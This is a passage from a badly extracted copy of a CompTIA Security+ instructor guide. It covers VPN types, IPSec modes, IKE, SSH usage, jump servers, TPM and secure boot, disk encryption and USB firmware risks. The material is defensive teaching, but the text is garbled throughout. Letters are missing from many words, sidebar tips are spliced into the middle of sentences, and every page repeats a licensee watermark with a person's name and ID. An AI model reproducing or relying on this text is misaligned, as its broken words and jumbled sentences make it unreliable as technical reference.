there is greater opportunity for remote logins to be e ploited. understand as a N
ith a remote access N, clients connect to a N gateway on the edge of the private these days.
network. This is the telecommuter model, allowing home workers and employees
working in the field to connect to the corporate network. The N protocol establishes
a secure tunnel so that the contents are kept private, even when the packets pass over
I s' routers.

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 302 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

emote access P . (Images 1 .com.)

A N can also be deployed in a site to site model to connect two or more private
networks. here remote access N connections are typically initiated by the client, a
site to site N is configured to operate automatically. The gateways e change security
information using whichever protocol the N is based on. This establishes a trust
relationship between the gateways and sets up a secure connection through which
to tunnel data. osts at each site do not need to be configured with any information
about the N. The routing infrastructure at each site determines whether to deliver
traffic locally or send it over the N tunnel.

Site-to-site P . (Images 1 .com.)

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 303

Transport Layer Security VPN Show Slide(s)

everal N protocols have been used over the years. Legacy protocols such as the Transport Layer
Point-to-Point Tunneling Protocol (PPTP) have been deprecated because they do not ecurity N
o er ade uate security. Transport Layer ecurity TL and I ec are now the preferred
options for configuring N access. Teaching
Tip
plain that the
important point
about modern
Ns is to hide
any authentication
information from
eavesdroppers.
rotocols such as
T do not protect
the hash e changed
during the C A
M C A handshake,
making the connection
e tremely vulnerable
to o ine cracking
attempts.

Configuring an Open P server in the pfSense security appliance.

(Screenshot used with permission from ubicon Communications, C.)

A TL N still more commonly referred to as an L N re uires a remote access

server listening on port or any arbitrary port number . The client makes a
connection to the server using TL so that the server is authenticated to the client and
optionally the client's certificate must be authenticated by the server . This creates
an encrypted tunnel for the user to submit authentication credentials, which would
normally be processed by a ADI server. nce the user is authenticated and the
connection fully established, the N gateway tunnels all communications for the local
network over the secure socket.

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 304 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Configuring a client certificate for mutual authentication in the pfSense security appliance.
(Screenshot used with permission from ubicon Communications, C.)

The port can be either TCP or U P. U P might be chosen for marginally superior
performance, especially when tunneling latency-sensitive traffic such as voice or video. TCP
Show Slide(s) might be easier to use with a default firewall policy. T S over U P is also referred to as
atagram T S ( T S).

Internet rotocol
ecurity
pen N is an open source e ample of a TL N openvpn.net . pen N can work
in TA bridged mode to tunnel layer frames or in T N routed mode to forward
Teaching
I packets. Another option is Microsoft's Secure Sockets Tunneling Protocol (SSTP),
Tip
which works by tunneling oint to oint rotocol layer frames over a TL
oint out that I ec
session docs.microsoft.com en us openspecs windows protocols ms sstp adc df
is an integral part of
I v . Its use with I v c fe b f d b ad a). The Point-to-Point Protocol (PPP) is a widely
is a stop gap until used remote dial in protocol. It provides encapsulation for I traffic plus I address
Internet infrastructure assignment and authentication via the widely supported Challenge andshake
finally switches over Authentication rotocol C A .
to I v the world's
largest software
upgrade . Internet Protocol Security
Note that A provides
only authentication Transport Layer ecurity is applied at the application level, either by using a separate
and integrity, not secure port or by using commands in the application protocol to negotiate a secure
confidentiality. connection. Internet Protocol Security (IPSec) operates at the network layer layer
Note also that only of the I model, so it can be implemented without having to configure specific
immutable fields in
application support. I ec can provide both confidentiality by encrypting data packets
the I header are used
in the IC . The TTL and integrity anti replay by signing each packet . The main drawback is that it adds
field is e cluded, for overhead to data communications. I ec can be used to secure communications on
instance. local networks and as a remote access protocol.

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 305

hen IPv6 was being drafted, IPSec was considered a mandatory component as it was
felt that all traffic over the new protocol should be secure. In recent years, Cs have been
revised so that now, IPSec is recommended for IPv6 but no longer mandatory (tools.ietf.org
html rfc6 page-1 ).

ach host that uses I ec must be assigned a policy. An I ec policy sets the
authentication mechanism and also the protocols and mode for the connection. osts
must be able to match at least one matching security method for a connection to
be established. There are two core protocols in I ec, which can be applied singly or
together, depending on the policy.

Authentication Header (AH)

The Authentication Header (AH) protocol performs a cryptographic hash on the
whole packet, including the I header, plus a shared secret key known only to the
communicating hosts , and adds this MAC in its header as an Integrity Check alue
IC . The recipient performs the same function on the packet and key and should
derive the same value to confirm that the packet has not been modified. The payload is
not encrypted so this protocol does not provide confidentiality. Also, the inclusion of I
header fields in the IC means that the check will fail across NAT gateways, where the
I address is rewritten. Conse uently, A is not often used.

IPSec datagram using A The integrity of the payload and IP header is ensured by the
Integrity Check alue (IC ), but the payload is not encrypted.

Encapsulation Security Payload (ESP)

Encapsulation Security Payload (ESP) provides confidentiality and or authentication
and integrity. It can be used to encrypt the packet rather than simply calculating an
MAC. attaches three fields to the packet a header, a trailer providing padding for
the cryptographic function , and an Integrity Check alue. nlike A , e cludes the
I header when calculating the IC .

IPSec datagram using ESP The TCP header and payload from the original packet are
encapsulated within ESP and encrypted to provide confidentiality.

ith ESP, algorithms for both confidentiality (symmetric cipher) and authentication integrity
(hash function) are usually applied together. It is possible to use one or the other, however.

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 306 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) IPSec Transport and Tunnel Modes

I ec Transport and
I ec can be used in two modes
Tunnel Modes • Transport mode this mode is used to secure communications between hosts on a
private network an end to end implementation . hen is applied in transport
Teaching
mode, the I header for each packet is not encrypted, ust the payload data. If A is
Tip
used in transport mode, it can provide integrity for the I header.
Make sure students
are clear about the
uses of transport and
tunnel mode and the
role of and A in
either.

IPSec datagram using A and ESP in transport mode.

• Tunnel mode this mode is used for communications between N gateways

across an unsecure network creating a N . This is also referred to as a router
implementation. ith , the whole I packet header and payload is encrypted
and encapsulated as a datagram with a new I header. A has no real use case in
tunnel mode, as confidentiality will usually be re uired.

IPSec datagram using ESP in tunnel mode.

Configuring an IPSec tunnel with ESP encryption in the pfSense security appliance.
(Screenshot used with permission from ubicon Communications, C.)

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 307

The principles underlying IPSec are the same for IPv and IPv6, but the header formats
are different. IPSec makes use of extension headers in IPv6 while in IPv , ESP and A are
allocated new IP protocol numbers ( 0 and 1), and either modify the original IP header or
encapsulate the original packet, depending on whether transport or tunnel mode is used.

Internet e chan e Show Slide(s)

I ec's encryption and hashing functions depend on a shared secret. The secret Internet ey change
must be communicated to both hosts and the hosts must confirm one another's
identity mutual authentication . therwise, the connection is vulnerable to man in Teaching
the middle and spoofing attacks. The Internet Key Exchange (IKE) protocol handles Tip
authentication and key e change, referred to as ecurity Associations A . plain how I
provides a connection
and authentication
mechanism for I ec.

Configuring I E in the pfSense security appliance. (Screenshot used with

permission from ubicon Communications, C.)

I negotiations take place over two phases

1. hase I establishes the identity of the two hosts and performs key agreement
using the Diffie ellman algorithm to create a secure channel. Two methods of
authenticating hosts are commonly used

• Digital certificates the hosts use certificates issued by a mutually trusted

certificate authority to identify one another.

• re shared key group authentication the same passphrase is configured on

both hosts.

2. hase II uses the secure channel created in hase to establish which ciphers
and key si es will be used with A and or in the I ec session.

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 308 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) a er Tunnelin rotocol and I

Layer Tunneling
This first version of I is optimi ed to ensure the mutual authentication of two peer
rotocol and I v hosts, such as in a site to site N. n its own, it does not provide a simple means for
a client user account to authenticate to a remote network directory. Conse uently,
Teaching for remote access Ns, a combination of I ec with the Layer 2 Tunneling Protocol
Tip (L2TP) N protocol is often used.
Note that the first
version of I was Layer 2 Tunneling Protocol/IPSec VPN
relatively difficult
to configure as a AL T I ec N would typically operate as follows
client authentication
mechanism for
1. The client and N gateway set up a secure I ec channel over the Internet, using
Windows hosts, so either a pre shared key or certificates for I .
the combination of
L T and I ec was
2. The N gateway uses L T to set up a tunnel to e change local network data
commonly used. encapsulated as oint to oint rotocol frames. This double encapsulation
Make sure students of traffic is the main drawback, as it adds overhead.
understand why C A
cannot be used with 3. The user authenticates over the session using A or C A .
a secure tunnel and
conse uently why IKE v2
T is now defunct .
I v is now better The drawbacks of the original version of I were addressed by an updated protocol.
supported. I v has some additional features that have made the protocol popular for use as a
standalone remote access N solution. The main changes are
• upport for A authentication methods, allowing, for e ample, user authentication
against a ADI server.
• implified connection set up I v specifies a single message setup mode,
reducing bandwidth without compromising security.
• eliability I v allows NAT traversal and M I multihoming. Multihoming
means that a client such as a smartphone with multiple interfaces such as i i and
cellular can keep the I ec connection alive when switching between them.

Compared to L T I ec, using I v is more efficient. This solution is becoming much

better supported, with native support in indows , for instance.

Show Slide(s) Client Confi uration

N Client
To configure a N client, you may need to install the client software if the N type is
Configuration not natively supported by the . or e ample, pen N re uires client installation.
ou then configure the client with the address of the N gateway, the N protocol
Teaching type if it cannot autodetect it , the username, and the account credentials. ou may
Tip also need to deploy a client certificate that is trusted by the N concentrator to the
Note that indows machine and make that available to the N client. In addition, you might need to
has native support configure settings for how the N connection operates.
for I v , L T
I ec, T , and T Always-On VPN
though no one should
be using T at this Traditional remote access N solutions re uire the user to initiate the connection and
point . enter their authentication credentials. An always on N means that the computer
establishes the N whenever an Internet connection over a trusted network is
detected, using the user's cached credentials to authenticate. Microsoft has an Always
n N solution for indows erver and indows clients docs.microsoft.com/
en us windows server remote remote access vpn always on vpn deploy always on
vpn deploy deployment and an pen N client can be configured to autoconnect
openvpn.net vpn server resources setting your client to automatically connect to
your vpn when your computer starts .

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 309

Split Tunnel versus Full Tunnel

hen a client connected to a remote access N tries to access other sites on the
Internet, there are two ways to manage the connection
• Split tunnel the client accesses the Internet directly using its native I
configuration and DN servers.

Split tunnel P traffic ow. (Images 1 .com.)

• Full tunnel Internet access is mediated by the corporate network, which will alter
the client's I address and DN servers and may use a pro y.

ull tunnel o ers better security, but the network address translations and DN
operations re uired may cause problems with some websites, especially cloud
services. It also means more data is channeled over the link.

ull tunnel P traffic ow. (Images 1 .com.)

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 310 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) emote es top

emote Desktop A remote access N oins the user's C or smartphone to the local network, via the
secure tunnel. Another model for remote networking involves connecting to a host
Teaching within the local network over a remote administration protocol. A protocol such as
Tip ecure hell only supports terminal access, but there are many other tools that
D gateways can connect to a graphical desktop. A I remote administration tool sends screen and
TML clientless are audio data from the remote host to the client and transfers mouse and keyboard input
not N solutions from the client to the remote host.
in the traditional
sense. Rather than Microsoft's Remote Desktop Protocol (RDP) can be used to access a physical machine
connecting a remote on a one to one basis. Alternatively, the site can operate a remote desktop gateway
client to a local that facilitates access to virtual desktops or individual apps running on the network
network, they provide servers docs.microsoft.com en us windows server remote remote desktop services
access to a real or
virtual desktop or
welcome to rds . There are several popular alternatives to emote Desktop. Most
app within the local support remote access to platforms other than indows mac and i , Linu ,
network. Rather than Chrome , and Android for instance . amples include Team iewer teamviewer.
tunneling all network com/en and Virtual Network Computing (VNC), which is implemented by several
traffic from a remote di erent providers notably realvnc.com en .
client, they ust tunnel
the ID traffic in and Traditionally, these remote desktop products re uire a client app. The canvas element
the audio video out. introduced in TML allows a browser to draw and update a desktop with relatively
little lag. It can also handle audio. This is referred to as an HTML5 VPN or as a clientless
remote desktop gateway guacamole.apache.org . This solution also uses a protocol
called eb ockets, which enables bidirectional messages to be sent between the
server and client without re uiring the overhead of separate TT re uests.

Show Slide(s) ut o and ana ement and ump er ers

ut of and
emote access management refers to the specific use case of using a secure channel to
Management and administer a network appliance or server. The secure admin workstations A s used
Jump ervers to perform management functions must be tightly locked down, ideally installed with
no software other than that re uired to access the administrative channel minimal
Teaching web browser, remote desktop client, or virtual terminal, for instance. A s should
Tip be denied Internet access or be restricted to a handful of approved vendor sites for
ou might want to patches, drivers, and support . The devices must also be sub ect to stringent access
point out another use control and auditing so that any misuse is detected at the earliest opportunity.
case for ump servers
to provide multiple Out-of-Band Management
hops through to
backend servers in the emote management methods can be described as either in band or out-of-
cloud. band (OOB). An in band management link is one that shares traffic with other
communications on the production network. A serial console or modem port on a
router is a physically out of band management method. hen using a browser based
management interface or a virtual terminal over thernet and I , the link can be
made out of band by connecting the port used for management access to physically
separate network infrastructure. This can be costly to implement, but out of band
management is more secure and means that access to the device is preserved when
there are problems a ecting the production network. ith an in band connection,
better security can be implemented by using a LAN to isolate management traffic.
This makes it harder for potential eavesdroppers to view or modify traffic passing over
the management interface. This sort of virtual does still mean that access could
be compromised by a system wide network failure, however.

Jump Servers
ne of the challenges of managing hosts that are e posed to the Internet, such as in
a DM or cloud virtual network, is to provide administrative access to the servers and
appliances located within it. n the one hand, a link is necessary on the other, the

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 311

administrative interface could be compromised and e ploited as a pivot point into

the rest of the network. Conse uently, the management hosts permitted to access
administrative interfaces on hosts in the secure one must be tightly controlled.
Configuring and auditing this type of control when there are many di erent servers
operating in the one is comple .
ne solution to this comple ity is to add a single administration server, or jump
server, to the secure one. The ump server only runs the necessary administrative
port and protocol typically or D . Administrators connect to the ump server
then use the ump server to connect to the admin interface on the application server.
The application server's admin interface has a single entry in its ACL the ump server
and denies connection attempts from any other hosts.

Show Slide(s)

ecure hell

Teaching
Tip
is primarily for
Securing management traffic using a ump server. NI Linu , though
there are Windows
versions. Windows
can also use the
proprietary indows
Secure Shell emote Management
in M and indows
Secure Shell (SSH) is the principal means of obtaining secure remote access to a emote hell in .
command line terminal. The main uses of are for remote administration and Make sure students
secure file transfer T . There are numerous commercial and open source understand the
products available for all the ma or N platforms. The most widely used is pen di erence between
openssh.com . identifying a server
via its host key, and
servers are identified by a public private key pair the host key . A mapping of host connecting to the
names to public keys can be kept manually by each client or there are various server using a client
enterprise software products designed for host key management. public key.

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 312 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Confirming the SS server s host key using the PuTTY SS client

(Screenshot used with permission from PuTTY.)

The host key must be changed if any compromise of the host is suspected. If an attacker has
obtained the private key of a server or appliance, they can mas uerade as that server or
appliance and perform a man-in-the-middle attack, usually with a view to obtaining other
network credentials.

The server's host key is used to set up a secure channel to use for the client to submit
authentication credentials.

SSH Client Authentication

allows various methods for the client to authenticate to the server. ach of
these methods can be enabled or disabled as re uired on the server, using the etc
ssh sshd config file
• sername password the client submits credentials that are verified by the
server either against a local user database or using a ADI TACAC server.

• ublic key authentication each remote user's public key is added to a list of keys
authori ed for each local account on the server.

• erberos the client submits the erberos credentials a Ticket ranting Ticket
obtained when the user logged onto the workstation to the server using A I
eneric ecurity ervices Application rogram Interface . The server contacts
the Ticket ranting ervice in a indows environment, this will be a domain
controller to validate the credential.

anaging valid client public keys is a critical security task. any recent attacks on web
servers have exploited poor key management. If a user s private key is compromised, delete
the public key from the appliance then regenerate the key pair on the user s (remediated)
client device and copy the public key to the SS server. Always delete public keys if the user s
access permissions have been revoked.

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 313

SSH Commands
commands are used to connect to hosts and set up authentication methods. To
connect to an server at . . . using an account named bobby and password
authentication, run
ssh [email protected]
The following commands create a new key pair and copy it to an account on the
remote server
ssh-keygen -t rsa
ssh-copy-id [email protected]
At an prompt, you can now use the standard Linu shell commands. se exit to
close the connection.
ou can also use the scp command to copy a file from the remote server to the
local host
scp [email protected]:/logs/audit.log audit.log
everse the arguments to copy a file from the local host to the remote server. To copy
the contents of a directory and any subdirectories recursively , use the -r option.

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 314 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Secure emote Access rotocols
Answer the following uestions

1. True or false? A TLS VPN can only provide access to web-based network
resources.

alse a Transport Layer ecurity TL N uses TL to encapsulate the private

network data and tunnel it over the network. The private network data could be frames
or I level packets and is not constrained by application layer protocol type.

2. What is Microsoft's TLS VPN solution?

The ecure ockets Tunneling rotocol T .

3. hat I ec mode ould ou use or data confidentialit on a pri ate

network?

Transport mode with ncapsulating ecurity ayload . Tunnel mode encrypts the
I header information, but this is unnecessary on a private network. Authentication
eader A provides message authentication and integrity but not confidentiality.

4. Which protocol is often used in conjunction with IPSec to provide a remote

access client VPN with user authentication?

Layer Tunneling rotocol L T .

5. What is the main advantage of IKE v2 over IKE v1?

ather than ust providing mutual authentication of the host endpoints, I v supports
a user account authentication method, such as tensible Authentication rotocol
A .

6. hat it o in ormation confirms the identit o an ser er to a client

The server's public key host key . Note that this can only be trusted if the client trusts
that the public key is valid. The client might confirm this manually or using a Certificate
Authority.

esson 11 Implementing Secure etwork Protocols | Topic 11C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 315

Lesson 11
Summary
ou should be able to configure secure protocols for local network access and Teaching
management, application services, and remote access and management. Tip
Check that students
Guidelines for Implementing Secure Network Protocols are confident about
the content that has
been covered. If there
ollow these guidelines when you implement or reconfigure network protocols is time, re visit any
• nsure availability for critical network address allocation D C , name resolution content e amples that
they have uestions
DN , directory access LDA , and time synchroni ation NT services. Monitor the
about. If you have
network to detect and remove rogue services. used all the available
time for this lesson
• Consider using NM for monitoring service availability. block, note the issues,
and schedule time for
• Assess the re uirements for securing an application protocol, such as certificates or a review later in the
shared keys for authentication and TC D port usage. nsure secure distribution course.
of credentials and create configuration documentation for secure usage.

• Deploy certificates to web servers to use with TT .

• Deploy certificates to email servers to use with secure MT , , and IMA .

• Deploy certificates or host keys to file servers to use with T or T .

• Deploy certificates to email clients to use with MIM .

• Deploy certificates to oI gateways and endpoints to use with I and T .

• Deploy certificates or shared keys to N gateways and clients for use with TL
Ns, I ec, and L T I ec.

• Configure D gateways and servers with certificates or host keys. Configure

client authentication using user credentials or public keys.

• Implement A s and out of band network interfaces or ump servers for secure
remote management of servers and network infrastructure.

esson 11 Implementing Secure etwork Protocols

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 12
Implementing Host Security Solutions

LESSON INTRODUCTION Teaching

Tip
ective network architecture design, protocol configuration, and the use of till pursuing the
appliances such as firewalls and intrusion detection help to provide a secure network protect infrastructure
environment, but we also need to consider the security systems configured on theme, this lesson
network hosts as well. ecurity procedures and solutions are complicated by the focuses on endpoint
range of di erent types of hosts that networks must support, from Cs and laptops to security. rdinary
hosts and embedded
smartphones and embedded controllers.
systems are covered
here, while mobile
Lesson Objectives is discussed in the
following lesson.
In this lesson, you will This lesson covers a
lot of material that
• Implement secure firmware. is difficult to support
with lab work so make
• Implement endpoint security. sure you allocate
plenty of time to
• plain embedded system security implications. covering it.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 318 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 12A
Implement Secure Firmware

Teaching EXAM OBJECTIVES COVERED

Tip 1.2 Given a scenario, analyze potential indicators to determine the type of attack
3.2 Given a scenario, implement host or application security solutions
As well as C
5.3 Explain the importance of policies to organizational security
hardware and
firmware security,
this topic covers The security of the hardware underpinning our network and computing devices is often
ash media attacks, overlooked. In part, this is because it is difficult for most companies to make their own
and looks at the third
investigations in this area. They have to rely on the market and security agencies to
party supply chain
content e amples identify bad actors in supply chains. Nevertheless, it is important that you understand
from . and . . the issues involved in secure systems design so that you can evaluate product o erings
and make recommendations for purchasing and device configuration.

Show Slide(s) ard are oot o Trust

ardware oot of
A hardware Root of Trust (RoT) or trust anchor is a secure subsystem that is able to
Trust provide attestation. Attestation means that a statement made by the system can be
trusted by the receiver. or e ample, when a computer oins a network, it might submit
Teaching a report to the network access control NAC server declaring, My operating system
Tip files have not been replaced with malicious versions. The hardware root of trust is
tudents should used to scan the boot metrics and files to verify their signatures, then it signs the
understand that report. The NAC server can trust the signature and therefore the report contents if it
a chain of trust can trust that the signing entity's private key is secure.
from the hardware
through to the The oT is usually established by a type of cryptoprocessor called a trusted platform
kernel and drivers module (TPM). T M is a specification for hardware based storage of encryption keys,
is a prere uisite for hashed passwords, and other user and platform identification information. The T M is
enforcing access implemented either as part of the chipset or as an embedded function of the C .
controls.
ou might want to ach T M is hard coded with a uni ue, unchangeable asymmetric private key called
mention The Trusted the endorsement key. This endorsement key is used to create various other types
Computing roup of subkeys used in key storage, signature, and encryption operations. The T M also
trustedcomputing supports the concept of an owner, usually identified by a password though this is
group.org as the
driver for many of
not mandatory . Anyone with administrative control over the setup program can take
these standards and ownership of the T M, which destroys and then regenerates its subkeys. A T M can
technologies. be managed in indows via the tpm.msc console or through group policy. n an
enterprise network, provisioning keys to the T M might be centrally managed via the
ey Management Interoperability rotocol MI .

Lesson 12: Implementing Host Security Solutions | Topic 12A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 319

Show Slide(s)

Configuring a Trusted Platform odule using system setup on an P workstation. oot Integrity
(Screenshot used with permission from P.)
Teaching
Tip
The problem with establishing a hardware root of trust is that devices are used in
e assume that
environments where anyone can get complete control over them. There cannot be students know what
complete assurance that the firmware underpinning the hardware root of trust is I is from A . If not,
inviolable, but attacks against trusted modules are sufficiently difficult so as to provide consider e plaining
e ective security in most cases. the di erence
between I and
I, though I
Boot Integrity motherboards are
increasingly scarce.
Most Cs and smartphones implement the unified e tensi le firm are inter ace plain how I
(UEFI). I provides code that allows the host to boot to an . I can enforce a is accessed and
number of boot integrity checks. configured.
Make sure students
Secure Boot can distinguish secure
boot from measured
Secure boot is designed to prevent a computer from being hi acked by a malicious . boot. ecure boot is
about provisioning
I is configured with digital certificates from valid vendors. The system firmware certificates for trusted
checks the operating system boot loader and kernel using the stored certificate to operating systems and
ensure that it has been digitally signed by the vendor. This prevents a boot loader blocking unauthori ed
or kernel that has been changed by malware or an installed without authori ation es. Measured
from being used. ecure boot is supported on indows docs.microsoft.com en us boot stores and
compares hashes of
windows security information protection secure the windows boot process and
critical boot files to
many Linu platforms wiki.ubuntu.com I ecure oot . ecure boot re uires I, detect unauthori ed
but does not re uire a T M. processes.
Attestation is the
Measured Boot process of sending
a signed boot log or
A trusted or measured boot process uses platform configuration registers C s report to a remote
in the T M at each stage in the boot process to check whether hashes of key system server.

Lesson 12: Implementing Host Security Solutions | Topic 12A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 320 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

state data boot firmware, boot loader, kernel, and critical drivers have changed.
This does not usually prevent boot, but it will record the presence of unsigned kernel
level code.

Boot Attestation
Boot attestation is the capability to transmit a boot log report signed by the T M via a
trusted process to a remote server, such as a network access control server. The boot
log can be analy ed for signs of compromise, such as the presence of unsigned drivers.
The host can be prevented from accessing the network if it does not meet the re uired
health policy or if no attestation report is received.

Show Slide(s)

Disk ncryption

Teaching
Tip
pal is comple , with
di erent options
for consumer and
enterprise grades.
tudents can refer to
the white paper and
TC slides for more
detail. This should
not be re uired Configuring secure boot settings via an P workstation s UE I firmware setup program.
for the e am, but if (Screenshot used with permission from P.)
you want to give an
overview, note that
enterprise grades
support multiple
locking ranges that Disk Encryption
can be associated with
di erent D s and Full disk encryption (FDE) means that the entire contents of the drive or volume ,
users. There is also a including system files and folders, are encrypted. ACL based security measures
parallel specification are uite simple to circumvent if an adversary can attach the drive to a di erent host
TC torage ecurity . Drive encryption allays this security concern by making the contents of the drive
ubsystem Class accessible only in combination with the correct encryption key. Disk encryption can be
nterprise aimed at
C I A devices. applied to both hard disk drives DDs and solid state drives Ds .
Note that D is one D re uires the secure storage of the key used to encrypt the drive contents.
of the best methods Normally, this is stored in a T M. The T M chip has a secure storage area that a disk
of media saniti ation, encryption program, such as indows itLocker, can write its keys to. It is also possible
via the Crypto rase
function. e'll discuss
to use a removable drive if is a boot device option . As part of the setup
saniti ation at the end process, you create a recovery password or key. This can be used if the disk is moved
of the course. to another computer or the T M is damaged.

Lesson 12: Implementing Host Security Solutions | Topic 12A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 321

Activating it ocker drive encryption. (Screenshot used with permission from icrosoft.)

ne of the drawbacks of D is that, because the performs the cryptographic

operations, performance is reduced. This issue is mitigated by self-encrypting drives
(SED), where the cryptographic operations are performed by the drive controller. The
D uses a symmetric data media encryption key D M for bulk encryption and
stores the D securely by encrypting it with an asymmetric key pair called either the
authentication key A or key encryption key (KEK). se of the A is authenticated by
the user password. This means that the user password can be changed without having
to decrypt and re encrypt the drive. arly types of Ds used proprietary mechanisms,
but many vendors now develop to the Opal torage pecification nvme press.org
wp content uploads TC andN Me Joint hite aper TC torage pal and N Me
INAL.pdf , developed by the Trusted Computing roup TC .

As configuring passwords on individual drives is a huge challenge when more than a few
machines are involved, enterprises may use the ey anagement Interoperability Protocol
( IP) along with a hardware security module ( S ) to automate the provisioning of
keys (trustedcomputinggroup.org wp-content uploads S G TCG Enterprise-Introduction
Sept2010.pdf).

and lash ri e ecurit Show Slide(s)

As revealed by researcher arsten Nohl in his ad paper srlabs.de wp content and lash Drive
uploads Labs ad lack at v .pdf , e ploiting the firmware of e ternal ecurity
storage devices, such as ash drives and potentially any other type of firmware ,
presents adversaries with an incredible toolkit. The firmware can be reprogrammed Teaching
to make the device look like another device class, such as a keyboard. In this case it Tip
could then be used to in ect a series of keystrokes upon an attachment or work as Make sure students
a keylogger. The device could also be programmed to act like a network device and understand the risks
corrupt name resolution, redirecting the user to malicious websites. from devices
and how to identify
Another e ample is the .M cable theverge.com apple mac indicators of attacks.
lightning cable hack mike grover mg omg cables defcon cybersecurity , which packs
enough processing capability into an ordinary looking Lightning cable to run an
access point and keylogger.
A modified device may have visual clues that distinguish it from a mass manufactured
thumb drive or cable, but these may be difficult to spot. ou should warn users of the
risks and repeat the advice to never attach devices of unknown provenance to their
computers and smartphones. If you suspect a device as an attack vector, observe a
sandbo ed lab system sometimes referred to as a sheep dip closely when attaching

Lesson 12: Implementing Host Security Solutions | Topic 12A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 322 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

the device. Look for command prompt windows or processes such as the command
interpreter starting and changes to the registry or other system files.

ot all attacks have to be so esoteric. US sticks infected with ordinary malware are still
incredibly prolific infection vectors. osts should always be configured to prevent autorun
when US devices are attached. US ports can be blocked altogether using most types of
Host Intrusion Detection Systems (HIDS).

Show Slide(s) Third-Party Risk Management

Third arty isk
A root of trust is only trustworthy if the vendor has implemented it properly. ardware
Management and firmware vulnerabilities and e ploits demonstrate the necessity of third party risk
management. A supply chain is the end to end process of supplying, manufacturing,
Teaching distributing, and finally releasing goods and services to a customer. or e ample, for a
Tip T M to be trustworthy, the supply chain of chip manufacturers, firmware authors, M
Note that there are resellers, and administrative sta responsible for provisioning the computing device
two main scenarios to the end user must all be trustworthy. Anyone with the time and resources to modify
for evaluating this risk. the computer's firmware could in theory create some sort of backdoor access. The
Most businesses will same is true for any kind of computer or network hardware, right down to cables.
ust focus on using
reputable suppliers stablishing a trusted supply chain for computer e uipment essentially means denying
and being e tremely malicious actors the time or resources to modify the assets being supplied.
careful about the
use of second hand
e uipment. Military or most businesses, use of reputable OE s will represent the best practical effort at
and secret service type securing the supply chain. Government, military security services, and large enterprises will
organi ations may exercise greater scrutiny. Particular care should be taken if use is made of second-hand
perform their own machines.
audits of suppliers.
emind students
about the controversy hen assessing suppliers for risk, it is helpful to distinguish two types of relationship
over uawei's
smartphones and • endor this means a supplier of commodity goods and services, possibly with
network infrastructure some level of customi ation and direct support.
appliances pcworld.
com article • usiness partner this implies a closer relationship where two companies share
cia fbi nsa officials uite closely aligned goals and marketing opportunities.
avoid huawei phones.
html . or e ample, Microsoft is a ma or software vendor, but it is not feasible for it to
establish direct relationships with all its potential customers. To e pand its markets,
it develops partner relationships with original e uipment manufacturers Ms and
solution providers. Microsoft operates a program of certification and training for its
partners, which improves product support and security awareness.

Show Slide(s) End of Life Systems

nd of Life ystems
hen a manufacturer discontinues sales of a product, it enters an end of life
(EOL) phase in which support and availability of spares and updates become more
Teaching limited. An end of service life (EOSL) system is one that is no longer supported by
